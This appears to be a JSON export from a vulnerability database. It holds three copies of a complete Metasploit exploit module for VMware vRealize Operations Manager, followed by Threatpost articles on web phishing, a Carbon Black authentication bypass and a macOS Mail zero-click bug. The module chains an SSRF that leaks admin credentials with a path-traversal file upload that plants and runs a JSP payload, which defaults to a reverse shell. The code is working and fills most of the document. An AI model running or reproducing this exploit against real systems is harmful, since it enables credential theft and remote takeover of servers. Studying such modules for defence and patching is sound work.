CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-18T23:22:38", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. 
Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations 
Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write 
(CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 
\nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T16:47:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "Smart cybercriminals are going after web servers and browsers, more so than after individuals. Unfortunately, these types of attacks often go ignored, as they\u2019re harder to test for (in terms of pen-testing).\n\nWith much of the world now working remotely, this threat has intensified. Attackers use email, instant messages, SMS messages and links on social networking to trick at-home workers into installing malware that leads to identity theft, loss of property and, possibly, entry into the corporate network. Phishing attacks may lead users to fake sites or landing pages, with the same intent.\n\nWhat are the latest risks organizations are facing, and what can be done now to defend against them?\n\n## **Web-Based Phishing On the Rise**\n\nThe cybersecurity industry is seeing a significant spike in web-based phishing, starting with the HTML/phishing cyber-threat family. 
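The module listed above chains two input-handling weaknesses: CVE-2021-21975, where `/casa/nodes/thumbprints` appends a fixed path to each submitted address and a trailing `#` in the address turns that path into a URL fragment, so the service contacts the attacker's listener and sends its own Authorization header; and CVE-2021-21983, where the `name` part of the certificate upload is joined onto a destination directory, so `../../../../..` followed by an absolute path drops the file wherever the attacker chooses. The following Python is an added illustration of both mechanisms beside hardened counterparts; it is not VMware's, Rapid7's or the module's own code. `THUMBPRINT_SUFFIX` stands in for the real appended path (the page never shows it), `CERT_DIR` is a hypothetical upload directory, and `CLUSTER_NODES` is a constructed allowlist.

```python
"""Added illustration (not VMware's or Rapid7's code) of the SSRF and the
path-traversal file write chained by the vROps module, each beside a
hardened version.  THUMBPRINT_SUFFIX, CERT_DIR and CLUSTER_NODES are
assumptions made for this example, not values taken from the product."""
import posixpath
from pathlib import PurePosixPath
from urllib.parse import urlsplit

THUMBPRINT_SUFFIX = "/casa/node/thumbprint"          # assumption: illustrative only
CERT_DIR = PurePosixPath("/storage/db/casa/certs")   # assumption: hypothetical dir
CLUSTER_NODES = {"10.0.0.11:443", "10.0.0.12:443"}   # constructed allowlist


def vulnerable_thumbprint_url(address: str) -> str:
    """How the SSRF works: the caller-supplied address is concatenated verbatim."""
    return f"https://{address}{THUMBPRINT_SUFFIX}"


def effective_target(url: str) -> tuple:
    """(netloc, path) an HTTP client actually uses.  Everything after '#' is a
    fragment and is never sent, which is what the module's trailing '#' relies on."""
    parts = urlsplit(url)
    return parts.netloc, parts.path


def safe_thumbprint_url(address: str) -> str:
    """Hardened builder: parse before concatenating, accept only a bare
    host[:port] with no userinfo, path, query or fragment, and require the
    address to be a known cluster member."""
    parts = urlsplit(f"https://{address}")
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        raise ValueError(f"address carries extra URL components: {address!r}")
    if parts.netloc != address or address not in CLUSTER_NODES:
        raise ValueError(f"address is not a known cluster node: {address!r}")
    return f"https://{address}{THUMBPRINT_SUFFIX}"


def vulnerable_cert_path(name: str) -> str:
    """How the file write works: 'name' is joined under CERT_DIR and merely
    normalised, so '..' segments walk straight out of the directory."""
    return posixpath.normpath(str(CERT_DIR / name))


def safe_cert_path(name: str) -> str:
    """Hardened: the name must be a single filename component and the
    normalised destination must still sit inside CERT_DIR."""
    if name in ("", ".", "..") or PurePosixPath(name).name != name:
        raise ValueError(f"not a plain filename: {name!r}")
    dest = PurePosixPath(posixpath.normpath(str(CERT_DIR / name)))
    if CERT_DIR not in dest.parents:
        raise ValueError(f"destination escapes {CERT_DIR}: {dest}")
    return str(dest)


def is_rejected(fn, value) -> bool:
    """True when the hardened function refuses the value."""
    try:
        fn(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    hook = "203.0.113.5:8443/hook#"   # constructed attacker listener, as the module builds it
    print(effective_target(vulnerable_thumbprint_url(hook)))  # ('203.0.113.5:8443', '/hook')
    print(is_rejected(safe_thumbprint_url, hook))             # True
    jsp = "../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/x.jsp"
    print(vulnerable_cert_path(jsp))  # /usr/lib/vmware-casa/casa-webapp/webapps/casa/x.jsp
    print(is_rejected(safe_cert_path, jsp))                   # True
```

The two checks are deliberately independent of the exact suffix or directory: the SSRF fix refuses anything that is not a bare allowlisted `host:port` before any string is built, and the upload fix rejects separators in the name and then re-verifies containment after normalisation, so either control alone would have stopped the module's chain.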
Similar HTML cousins \u2013 /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) \u2013 have also contributed to the increase in phishing attempts in 2020. Web-based malware tends to override or bypass most common antivirus (AV) programs, giving it a greater chance of survival and successful infection.\n\nThis reveals a strong interest from cybercriminals in attacking users where they are often most vulnerable and gullible: browsing the web. The combination of remote work and online shopping expand this threat significantly. Black Friday shoppers last year spent a record-shattering [$9 billion](<https://abcnews.go.com/Business/black-friday-hits-record-report/story?id=74435965>), for instance. With the COVID-19 risk of in-person shopping, 2020\u2019s Cyber Monday was reportedly the largest online sales day ever. Web-based malware can obscure and/or bypass traditional AV products, upping the chance of successful infection.\n\n## **Browsers: A Key Delivery Vector for Malware **\n\nBrowsers are not easy to secure, and web applications can be challenging to monitor. These are some of the reasons why the browser has become a key delivery vector for malware over the last year, and this trend will likely continue for the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the shift to remote work.\n\nThis shift reinforces the point that cybercriminals have intentionally changed their attack methodologies to target the traffic that is now flooding lesser-secured networks. Malware trends reflect attackers\u2019 intentions and capabilities. Similar to intrusion-prevention system (IPS) detections, malware picked up by security sensors does not always indicate confirmed infections, but rather the weaponization and/or distribution of malicious code. 
Detections can occur at the network, application and host level on many different devices.\n\n## **What Cybersecurity Actions Should I Take Now?**\n\nThere are three things that organizations need to consider when it comes to their cybersecurity strategy:\n\n 1. **Cyber-hygiene is key:** Organizations must provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network. This involves training but also guidance on software updates.\n 2. **Organizations can\u2019t rely on employees\u2019 personal security:** They must also provide additional resources, such as endpoint detection-and-response (EDR) solutions that can detect and stop advanced threats. Organizations need advanced, real-time threat protection for endpoints both pre- and post-infection.\n 3. **Effective cybersecurity necessitates continuous vigilance and adaptability to changing threat strategies:** Though security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, adaptable, and integrated solutions \u2013 particularly as cybercriminals modify their attack methods to use personal devices as a springboard to enterprise networks. With this in mind, fortifying remote systems and networks should top the security to-do list.\n\n## **Staying Well-Equipped**\n\nThe threat landscape shifts constantly, requiring security pros to keep on top of new threat types and vectors. Savvy defenders should note that the browser was a prime delivery vector for malware in 2020 \u2013 and is likely to be again this year \u2013 and act accordingly to ensure consistent controls for remote systems. 
Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity.\n\nVital components of this approach include continuous access to up-to-date threat intelligence and cybersecurity training for all employees, particularly those who work remotely. It\u2019s also essential to use updated security technology, such as EDR, which detects and halts advanced threats in real time. All the intelligence in the world won\u2019t do an organization any good if its security tools aren\u2019t capable of using it to find and mitigate attacks. Make sure all of these tactics are part of your comprehensive security strategy.\n\n**_Aamir Lakhani is a cybersecurity researcher and practitioner for Fortinet\u2019s FortiGuard Labs. _**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "modified": "2021-04-05T17:28:13", "published": "2021-04-05T17:28:13", "id": "THREATPOST:6C1025257B798335D913F95B63229B76", "href": "https://threatpost.com/how-to-defend-the-extended-network-against-web-risks/165236/", "type": "threatpost", "title": "How To Defend the Extended Network Against Web Risks", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T21:03:22", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "A critical security vulnerability in the VMware Carbon Black Cloud Workload appliance would allow privilege escalation and the ability to take over the administrative rights for the solution.\n\nThe bug (CVE-2021-21982) ranks 9.1 out of 10 on the CVSS vulnerability-severity scale.\n\nThe VMware Carbon Black Cloud Workload platform is designed to provide cybersecurity defense for virtual servers and workloads that are hosted on the VMware\u2019s vSphere platform. 
vSphere is VMware\u2019s cloud-computing virtualization platform.\n\nThe issue in the appliance stems from incorrect URL handling, according to VMware\u2019s advisory issued last week.\n\n\u201cA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\u201d the company noted. \u201cAn adversary who has already gained network access to the administrative interface of the appliance may be able to obtain a valid authentication token.\u201d\n\nThat in turn would allow the attacker to access the administration API of the appliance. Once signed in as an admin, the attacker could then view and alter administrative [configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>). Depending on what tools an organization has deployed within the environment, an adversary could carry out a range of attacks, including code execution, disabling security monitoring, enumerating virtual instances within a private cloud and more.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d said the Cybersecurity and Infrastructure Security Agency (CISA) in a [concurrent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/vmware-releases-security-update>) on the bug.\n\nCompanies are urged to update to the latest version, [version 1.0.2](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/rn/cbc-workload-102-release-notes.html>), of the VMware Carbon Black Cloud Workload appliance, which contains a fix.\n\nUsers should also limit access to the local administrative interface of the appliance to only those that need it, VMware recommended.\n\nEgor Dimitrenko of Positive Technologies was credited with discovering the vulnerability.\n\nThe security hole is only the latest critical problem that VMware has 
addressed. In February for instance, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. 
_**\n\n**_ _**\n", "modified": "2021-04-06T20:55:47", "published": "2021-04-06T20:55:47", "id": "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "href": "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "type": "threatpost", "title": "Critical Bug in VMWare Carbon Black Allows Takeover", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:39:22", "description": "A zero-click security vulnerability in Apple\u2019s macOS Mail would allow a cyberattacker to add or modify any arbitrary file inside Mail\u2019s sandbox environment, leading to a range of attack types.\n\nAccording to Mikko Kentt\u00e4l\u00e4, founder and CEO of SensorFu, exploitation of the bug could lead to unauthorized disclosure of sensitive information to a third party; the ability to modify a victim\u2019s Mail configuration, including mail redirects which enables takeover of victim\u2019s other accounts via password resets; and the ability to change the victim\u2019s configuration so that the attack can propagate to correspondents in a worm-like fashion.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThough the researcher is just now making the bug\u2019s [details available](<https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c>), it was patched in macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.5, so users should update accordingly.\n\n## **Unauthorized Write Access**\n\nKentt\u00e4l\u00e4 said he discovered the bug ([CVE-2020-9922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9922>)) by sending test messages and following Mail process syscalls.\n\nHe found that \u201cmail has a feature which enables it to automatically uncompress attachments which have been automatically compressed by another Mail user,\u201d he explained. 
\u201cIn the valid use case, if the user creates email and adds the folder as an attachment it will be automatically compressed with ZIP and x-mac-auto-archive=yes; is added to the MIME headers. When another Mail user receives this email, compressed attachment data is automatically uncompressed.\u201d\n\nHowever, the researcher discovered that parts of the uncompressed data are not removed from the temporary directory \u2013 and that the directory serves multiple functions, allowing attackers to pivot within the environment.\n\n\u201c[It] is not unique in context of Mail, this can be leveraged to get unauthorized write access to ~/Library/Mail and to $TMPDIR using symlinks inside of those zipped files,\u201d Kentt\u00e4l\u00e4 explained.\n\n## **Zero-Click Attack Path**\n\nTo exploit the bug, a cyberattacker could email two .ZIP files as attachments to the victim, according to the analysis. When a user receives the email, the Mail app will parse it to find any attachments with x-mac-auto-archive=yes header in place. Mail will then automatically unpack those files.\n\n\u201cThe first .ZIP includes a symlink named Mail which points to victims\u2019 $HOME/Library/Mail and file 1.txt,\u201d said Kentt\u00e4l\u00e4. \u201cThe .ZIP gets uncompressed to $TMPDIR/com.apple.mail/bom/. Based on the filename=1.txt.zip header, 1.txt gets copied to the mail directory and everything works as expected. However, cleanup is not done the right way and the symlink is left in place.\u201d\n\nThis left-behind symlink anchors the second stage of the attack.\n\n\u201cThe second attached .ZIP includes the changes that you want to do to $HOME/Library/Mail. This will provide arbitrary file write permission to Library/Mail,\u201d the researcher explained. \u201cIn my example case I wrote new Mail rules for the Mail application. 
